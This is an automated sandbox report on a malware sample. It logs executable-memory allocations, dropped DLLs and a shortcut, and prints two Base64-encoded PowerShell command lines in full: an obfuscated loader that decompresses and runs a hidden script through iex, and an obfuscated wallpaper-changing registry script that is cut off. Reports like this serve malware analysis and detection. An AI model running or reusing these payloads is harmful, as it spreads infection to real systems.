NtProtectVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x733f3000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02630000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72991000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72992000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b2e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2232 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	c:\Users\test22\AppData\Local\Temp\c0nnsbkt.dll
file	c:\Users\test22\AppData\Local\Temp\w5n2hyfx.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -Enc KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAG0AUABSAEUAUwBzAGkATwBuAC4ARABlAGYATABhAFQARQBzAHQAcgBlAGEAbQAoAFsAaQBPAC4ATQBFAE0ATwByAFkAUwBUAHIARQBhAE0AXQBbAHMAWQBTAHQAZQBtAC4AQwBvAG4AdgBFAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAEUANgA0AHMAdABSAGkAbgBnACgAJwByAFYAVgBSAGIAOQBvADYARgBIADUASAA0AGoAOQBZAEMAQQBtAGkAawBaAFIAYgBXAEsAZABMAFYAVwBtAFUAcgBoAHUANgBhADEAYwBKAGQAdgBmAEEAKwBtAEMAYwBBAC8ASABGADIASgBuAHQAbABIAEsAMwAvAHYAYwBkAHgAdwBtAEYAagBqAHgATQBtAGwAOABTAE8ALwBiADMAZgBlAGUAYwA3AHoAaABOAFMAeQA1AEkAYQAzAFkAbAB4AEgAaQBkAEsAbQAzAGIAagBjAHkAQQA3AHAAMQBHAHMAUgBDAE4ANABKADYAawAyAFYAeAB3AFIAbwB5AGwARgBoAC8AdwBhAEUARgBMAE0AbABkAEsAawBFAG0AaQBOAGwAKwA0AGoATgBXAG0AegBhAFUAbABDAFoAVwB4AGcAQQA1AHgANwAyADQAMwBCAE8AZQB0AGUAbwAzAEcAYwBXAGkAMwBLAFoAQgBRADAAagBXAFEARABaAGMAawBYAE0ATgA2AEQAcABvADAAcgBWADgAMABLAFcAVgBBAEoATwBJAC8AUQBMADAAMgA4AHkAOABSADcAcgB3AGYARABQAFkANAAyAHIAUABKADEAbABoAFkAUgAxAGUAYwBMAHEAVQB5AEsATQBkAEUAZAAxAG8AeABNAEEAWgAzAHYAZwBjADcAeQByAFEARwBhAFkAdQAxAGQAawBCACsARQBGAHcATgBpADMAawBRADMAVgBBAHUAUABkAGkASABRAG0AcwAzAHEATgBmAHEAdABVAFUAbQBtAGUAVgBLAGsAcgBGADgAVQBDAHMASQBoACsAMwBtAEgAYgBVAEoANQBxAFgAUgBCAFAAawB3AFEATgBMADAANgB3AHEAMgBRAGkAMgBYAG8AQwBQADcAYQBCAHMAQgArAFYANgB2AEUAUgB4AE4AdwA1AGUAbwBPAE4ATgBnAGMAUAA5AGIAagBMAGcAaQBsAFIAMAB5AFMAcQBpAGUAZwBMADAAbwBuAHQARQB3AHMANgBwAEQAMwBqADEAUwBaAGkAYwBwAEMATQBIAGwAOABzAEwAcQBEAEkATAA3AGUAdQAxAG8AMQBrADIAQwBvAEMANgBrAG8AZABsAEsAOQBnADkAcwBKAHkANwBOAGUAZgBJAGYAdQBMAFkAWgBGAGIAZwAyAFUAagBGAG0ALwBqAGQAbABWAEYASQA2AGIAQwBSAEUAMwBMAG0AaQBPAHYAYQBFADgANgAyAEYAMgBUADMAQgBqAEIAUgAxAC8AcABOAHMATgB6AFQAOQBkAHgAZABNAE8AMwBOAEwAbQBZAHYASgBHAHkAdgBEAHoAMQBPADAAMAA1AC8AbABuAEsAcgBQAGsAagBNAGsAOABYAHcAYgBKAHcARABaAE8AOABSAFAASgA0AHgASwBMADYARwBJAFgASwBSAGwANwBCADEAUwBtAEgASwBLAGMATgBIAEUAYQBpAHoAaQBaAGMAWgBGAGoAUAA1AE8ATgArAGIALwB5ADIAeQB4ADgATQBvAFoAUwAvAHoARQBZADEANABMAHUAagBRAHUAaQB0AFoAYgBaADgASABjAFMAcwBPADcATQBYAHAAbwBpAEIAMAB6AHoAVAB2AG0ASgB1ACsAVABLADEAaAB3AHkAWABOAC8ANwBwAHMAdAB2AEgAWAA5ADEARQBJAC8AOQAwADUAYgBmAHUAWQBiAHkAYQBHAEUAZAA5AFMAWQBhAGEASwB6AEgAYgBiAE0AaABFAEQAdwBXADkAaQBFAFkAOQBUAHIAZABxAEQARAB2AGMALwB6AGwAWgB6AHkAbQBnAHYAawB2AFYAYQBhAFEAWABuAFMANgBtADMAcABkAFQAYwAyAGkAZAB2AFMAYgB1AFoARwAzAGYALwBnAEIAdABwAEQAMgAzAEEAaQBBAEYASgBVAHoAOQBIAFMAQgBwAGkAUwBzAFMARwB2AHUAeQBWAGUATwBSAFoASwBJAHcAdwAxAGoASABQAFUAOQBmAGMANQBLAGQANQBEAGgARAA5ADkAMwBTAC8AbgByADEANwA5AHcAdQBMAGIAegBtAFUAZgBEADcAcQBrADUAYwAxAC8AMgBCAFAAKwBjAFAAQwBTADEAQQAyACsAUQBGADUALwBQAEkAUgB2AEoATwB5AGQAdgBqAGwANwBjADUAUgBrAFAAMwBFAHoAagBNAE0AbwBBAFgAagBUAGoARwBoAHEAUABpAHEAMgBPAGcAYQBlAEgAMwBsAHUAeABwADMAQQBRADEAZAA3AGQAUgAzAFMATwB5AG8AdwB4ADEAagBOAHkAdwBoAGQAeQBUADcATgAvAHcATwBHADEANgBVAHIAVQBsADcAMwBTADIALwBFAGMASwBpAFgAMgBSAHIAdgB2AEkALwBjAFcARQB6AGIAVwBRAFUAYQBTADQAQwB0AG4AaQBGADMAUwBUAHYAcwA2ADUASQAwAHEARQBCAFoAYgB4AGwAMgBWAEoAVwBrAHkAawBhAG8AUQBEAE0AWgBjADkAZgB5AFQAcwA1AHoARQA1AGIAcAAyAFUAdABrAFoANQBlAFIAVABxAGwAagA5AHgASgBoAFEAUwBqAGoAZABsAHYAZQA1ADgAZgBvAGYATgBVADkAWgBXAFcAeAAzAFMAagAvAE0AdQBOAFAAawBlAHMARwByAFAAYwB3AFQAVQBIAEcAUQB5AEYAYwBhAFAANwBYAHMAQwBkAGkAdABoAC8AMwBPADQAawBCAFkATwBSADQAcQBnAGkAbQBJAHAAZABQAHYAeQA2AC8AVwBIAG8AeABQAFoAdwAxAE4AKwB5AHcARABJAFcASQBXADcAegB0AHYAcwBCADgASgBEAGgANgA0AHYAegBGAEcAZgArAEwAdwBxAFAAUgA1ADEAUQBvAEcAcgB2AHcAMgBvADMARQAyAG4AUgB3AGMAdABMAHIAUgAyAGYAOQA2AEsAOQArAEwAKwByADEAQgA3ADEAdQB0ADMAdQBDAEYAMgBrAGUAYQA3AEMASABVADQAaAA2AEkAaQBOAHEAVwBVAEsAKwB1ADQAVQBuAGwALwBMAHkAegAvAGsAVAAnACkAIAAsACAAWwBTAFkAUwB0AEUAbQAuAGkATwAuAGMAbwBNAHAAUgBlAHMAcwBJAG8AbgAuAGMATwBNAFAAcgBFAHMAUwBJAE8ATgBNAE8ARABFAF0AOgA6AEQAZQBjAE8ATQBQAHIAZQBzAHMAIAApACAAfABmAE8AcgBFAEEAQwBIAC0AbwBCAEoAZQBjAHQAIAB7ACAAbgBlAFcALQBvAEIASgBlAEMAVAAgACAAcwB5AFMAdABFAG0ALgBpAG8ALgBTAHQAcgBFAGEATQByAEUAYQBkAEUAUgAoACQAXwAsAFsAdABlAFgAdAAuAGUATgBjAG8ARABJAE4ARwBdADoAOgBBAHMAYwBJAGkAKQAgAH0AKQAuAFIAZQBBAGQAVABvAGUATgBEACgAIAApAHwAIAAuACgAIAAkAFAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBIAE8ATQBlAFsAMwA0AF0AKwAnAFgAJwApAA==

cmdline

powershell -Enc ZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGEAbABsAFAAYQBwAGUAcgAgAHsAIAAgACAADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAewBUAHIAYABVAEUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAUAByAG8AdgBpAGQAZQAgAHAAYQB0AGgAIAB0AG8AIABpAG0AYQBnAGUADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AEkAYABNAGAAQQBnAEUAfQAsAA0ACgAgACAAIAAgACAAIAAgACAAIwAgAFAAcgBvAHYAaQBkAGUAIAB3AGEAbABsAHAAYQBwAGUAcgAgAHMAdAB5AGwAZQAgAHQAaABhAHQAIAB5AG8AdQAgAHcAbwB1AGwAZAAgAGwAaQBrAGUAIABhAHAAcABsAGkAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB7AEYAYABBAGAAbABTAGUAfQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACgAJwBGACcAKwAnAGkAbABsACcAKQAsACAAKAAnAEYAJwArACcAaQB0ACcAKQAsACAAKAAnAFMAJwArACcAdAByAGUAJwArACcAdABjAGgAJwApACwAIAAoACcAVABpACcAKwAnAGwAZQAnACkALAAgACgAJwBDAGUAbgB0AGUAJwArACcAcgAnACkALAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AJAB7AFMAYABUAHkAbABlAH0ADQAKACAAIAAgACAAKQANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACQAewBXAGAAQQBgAEwATABwAGEAUABFAHIAYABzAFQAWQBMAGUAfQAgAD0AIABTAHcAaQB0AGMAaAAgACgAJAB7AHMAVAB5AGAAbABlAH0AKQAgAHsADQAKACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEYAaQBsACcAKwAnAGwAJwApACAAewAnADEAMAAnAH0ADQAKACAAIAAgACAAIAAgACAAIAAoACcARgBpACcAKwAnAHQAJwApACAAewAiADYAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFMAdAByAGUAdAAnACsAJwBjAGgAJwApACAAewAiADIAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAFQAaQAnACsAJwBsAGUAJwApACAAewAiADAAIgB9AA0ACgAgACAAIAAgACAAIAAgACAAKAAnAEMAJwArACcAZQBuAHQAZQByACcAKQAgAHsAIgAwACIAfQANAAoAIAAgACAAIAAgACAAIAAgACgAJwBTAHAAYQAnACsAJwBuACcAKQAgAHsAJwAyADIAJwB9AA0ACgAgACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAASQBmACgAJAB7AHMAVABgAFkAbABFAH0AIAAtAGUAcQAgACgAJwBUAGkAJwArACcAbABlACcAKQApACAAewANAAoAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAbgBFAGAAdwAtAGAAaQBUAGUAbQBgAHAAUgBPAFAAZQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwBDAFUAOgBrAHkANQBDACcAKwAnAG8AbgB0AHIAJwArACcAbwBsACcAKwAnACAAUAAnACsAJwBhAG4AZQBsAGsAJwArACcAeQA1AEQAZQBzAGsAdABvACcAKwAnAHAAJwApACAAIAAtAFIAZQBwAGwAQQBjAEUAJwBrAHkANQAnACwAWwBjAGgAYQByAF0AOQAyACkAIAAtAE4AYQBtAGUAIABXAGEAbABsAHAAYQBwAGUAcgBTAHQAeQBsAGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACQAewBXAGEAbABgAGwAcABBAFAAZQByAHMAVAB5AGAATABlAH0AIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAE4ARQBgAHcALQBJAFQARQBtAHAAUgBgAG8AYABQAGAARQByAFQAeQAgAC0AUABhAHQAaAAgACgAKAAnAEgASwAnACsAJwBDAFUAOgBsAGgAJwArACcAeABDAG8AbgB0AHIAbwBsACcAKwAnACAAJwArACcAUABhAG4AZQBsAGwAaAB4AEQAZQBzAGsAdABvAHAAJwApAC4AcgBFAHAAbABhAEMAZQAoACgAWwBjAEgAQQBSAF0AMQAwADgAKwBbAGMASABBAFIAXQAxADAANAArAFsAYwBIAEEAUgBdADEAMgAwACkALAAnAFwAJwApACkAIAAtAE4AYQBtAGUAIABUAGkAbABlAFcAYQBsAGwAcABhAHAAZQByACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAEUAbABzAGUAIAB7AA0ACgAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABOAGAAZQBXAC0AaQBUAEUATQBwAGAAUgBPAGAAcABFAHIAYABUAHkAIAAtAFAAYQB0AGgAIAAoACgAJwBIAEsAQwBVADoAJwArACcAagBUAGYAQwBvAG4AJwArACcAdAAnACsAJwByAG8AbAAgAFAAJwArACcAYQBuACcAKwAnAGUAJwArACcAbABqAFQAZgAnACsAJwBEAGUAcwBrAHQAbwBwACcAKQAtAFIARQBwAEwAYQBDAEUAKABbAGMASABhAFIAXQAxADAANgArAFsAYwBIAGEAUgBdADgANAArAFsAYwBIAGEAUgBdADEAMAAyACkALABbAGMASABhAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFcAYQBsAGwAcABhAHAAZQByAFMAdAB5AGwAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAJAB7AHcAYQBsAEwAUABhAGAAcABFAFIAUwB0AGAAeQBgAGwAZQB9ACAALQBGAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIABuAGAAZQBXAC0AaQBUAGUAbQBgAHAAcgBgAE8AcABFAFIAdABZACAALQBQAGEAdABoACAAKAAoACcASABLAEMAJwArACcAVQA6ADYAVwBVAEMAbwBuAHQAcgBvAGwAIABQAGEAbgBlAGwANgAnACsAJwBXAFUARAAnACsAJwBlACcAKwAnAHMAawAnACsAJwB0AG8AcAAnACkAIAAtAEMAcgBFAHAAbABBAEMAZQAnADYAVwBVACcALABbAGMASABBAFIAXQA5ADIAKQAgAC0ATgBhAG0AZQAgAFQAaQBsAGUAVwBhAGwAbABwAGEAcABlAHIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQANAAoAIAAgACAAIAAgAA